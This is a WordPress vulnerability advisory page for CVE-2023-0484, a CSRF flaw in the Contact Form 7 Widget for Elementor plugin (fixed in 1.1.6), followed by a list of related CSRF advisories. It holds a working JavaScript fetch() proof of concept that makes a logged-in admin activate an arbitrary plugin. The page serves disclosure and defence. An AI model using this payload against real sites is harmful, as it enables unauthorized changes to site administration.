Contact Form 7 Widget For Elementor Page Builder & Gutenberg Blocks < 1.1.6 – Arbitrary Plugin Activation via CSRF | CVE 2023-0484 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack

Proof of Concept

activate woocommerce plugin exploit:

fetch('http://localhost/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=ht-contactform_ajax_plugin_activation&location=woocommerce/woocommerce.php',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

Fixed in 1.1.6

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

e61fb245-0d7f-42b0-9b96-c17ade8c04c5

Timeline

Publicly Published

2023-02-28 (about 1 years ago)

Added

2023-02-28 (about 1 years ago)

Last Updated

2023-03-06 (about 1 years ago)

Other

Published

Title

Published

2018-05-28

Title

JS Job <= 1.0.6 - CSRF

Published

2023-10-22

Title

Smooth Scroll Links <= 1.1.0 - Arbitrary Settings Update via CSRF

Published

2023-10-27

Title

Auto Excerpt everywhere <= 1.5 - Cross-Site Request Forgery

Published

2022-04-11

Title

Yoo Slider < 2.1.0 - Arbitrary Template Import via CSRF

Published

2024-03-12

Title

Easy Social Feed < 6.5.5 - Cross-Site Request Forgery